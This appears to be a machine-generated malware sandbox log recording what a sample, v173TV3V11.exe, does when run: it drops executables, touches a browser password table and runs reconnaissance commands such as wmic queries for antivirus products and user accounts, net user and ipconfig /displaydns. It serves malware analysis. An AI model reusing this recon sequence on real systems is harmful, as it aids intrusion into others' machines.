Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="3404"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="5108"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="5484"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="5704"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="5860"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="4920"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1328"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="4584"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1744"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2364"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="564"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1836"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2412"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="6720"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="6940"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="6496"::GetOwner

Source: C:\Windows\explorer.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\v173TV3V11.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: A115.tmp.11.dr

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: unknown	Process created: C:\Users\user\Desktop\v173TV3V11.exe "C:\Users\user\Desktop\v173TV3V11.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\bsjhhuh C:\Users\user\AppData\Roaming\bsjhhuh
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\C35.exe C:\Users\user\AppData\Local\Temp\C35.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\vejhhuh C:\Users\user\AppData\Roaming\vejhhuh
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\451E.exe C:\Users\user\AppData\Local\Temp\451E.exe
Source: unknown	Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Users\user\AppData\Local\Temp\451E.exe	Process created: C:\Windows\System32\cmd.exe cmd
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /format:csv
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /format:csv
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path AntiSpywareProduct Get displayName /format:csv
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Processor Get Name,DeviceID,NumberOfCores /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Product Get Name,Version /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_NetworkAdapter Where PhysicalAdapter=TRUE Get Name,MACAddress,ProductName,ServiceName,NetConnectionID /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_StartupCommand Get Name,Location,Command /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_OperatingSystem Get Caption,CSDVersion,BuildNumber,Version,BuildType,CountryCode,CurrentTimeZone,InstallDate,LastBootUpTime,Locale,OSArchitecture,OSLanguage,OSProductSuite,OSType,SystemDirectory,Organization,RegisteredUser,SerialNumber /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Process Get Caption,CommandLine,ExecutablePath,ProcessId /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Volume Get Name,Label,FileSystem,SerialNumber,BootVolume,Capacity,DriveType /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_UserAccount Get Name,Domain,AccountType,LocalAccount,Disabled,Status,SID /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_GroupUser Get GroupComponent,PartComponent /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_ComputerSystem Get Caption,Manufacturer,PrimaryOwnerName,UserName,Workgroup /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_PnPEntity Where ClassGuid="{50dd5230-ba8a-11d1-bf5d-0000f805f530}" Get Name,DeviceID,PNPDeviceID,Manufacturer,Description /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\ipconfig.exe ipconfig /displaydns
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\ROUTE.EXE route print
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh firewall show state
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /v /fo csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net accounts /domain
Source: C:\Windows\System32\net.exe	Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 accounts /domain
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net share
Source: C:\Windows\System32\net.exe	Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 share
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net user
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\C35.exe C:\Users\user\AppData\Local\Temp\C35.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\451E.exe C:\Users\user\AppData\Local\Temp\451E.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\451E.exe	Process created: C:\Windows\System32\cmd.exe cmd	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /format:csv	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /format:csv	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path AntiSpywareProduct Get displayName /format:csv	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Processor Get Name,DeviceID,NumberOfCores /format:csv	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Product Get Name,Version /format:csv	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_NetworkAdapter Where PhysicalAdapter=TRUE Get Name,MACAddress,ProductName,ServiceName,NetConnectionID /format:csv	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_StartupCommand Get Name,Location,Command /format:csv	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_OperatingSystem Get Caption,CSDVersion,BuildNumber,Version,BuildType,CountryCode,CurrentTimeZone,InstallDate,LastBootUpTime,Locale,OSArchitecture,OSLanguage,OSProductSuite,OSType,SystemDirectory,Organization,RegisteredUser,SerialNumber /format:csv	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Process Get Caption,CommandLine,ExecutablePath,ProcessId /format:csv	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Volume Get Name,Label,FileSystem,SerialNumber,BootVolume,Capacity,DriveType /format:csv	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_UserAccount Get Name,Domain,AccountType,LocalAccount,Disabled,Status,SID /format:csv	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_GroupUser Get GroupComponent,PartComponent /format:csv	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_ComputerSystem Get Caption,Manufacturer,PrimaryOwnerName,UserName,Workgroup /format:csv	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_PnPEntity Where ClassGuid="{50dd5230-ba8a-11d1-bf5d-0000f805f530}" Get Name,DeviceID,PNPDeviceID,Manufacturer,Description /format:csv	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\ipconfig.exe ipconfig /displaydns	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\ROUTE.EXE route print	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh firewall show state	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\systeminfo.exe systeminfo	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /v /fo csv	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net accounts /domain	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net share	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net user	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /format:csv	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\net.exe	Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 accounts /domain
Source: C:\Windows\System32\net.exe	Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 share
Source: C:\Windows\System32\net.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\v173TV3V11.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\v173TV3V11.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Desktop\v173TV3V11.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: mfsrcsnk.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bsjhhuh	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bsjhhuh	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bsjhhuh	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C35.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C35.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C35.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vejhhuh	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vejhhuh	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vejhhuh	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\451E.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\451E.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\451E.exe	Section loaded: winscard.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\451E.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\451E.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\451E.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\451E.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\451E.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\451E.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\451E.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\451E.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\451E.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\451E.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\451E.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\451E.exe	Section loaded: cryptnet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\451E.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\451E.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\451E.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\451E.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\451E.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\451E.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\451E.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\451E.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\451E.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\451E.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\451E.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\451E.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\451E.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\451E.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\451E.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: aepic.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: twinapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: winbrand.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: aepic.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: twinapi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: aepic.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: twinapi.dll
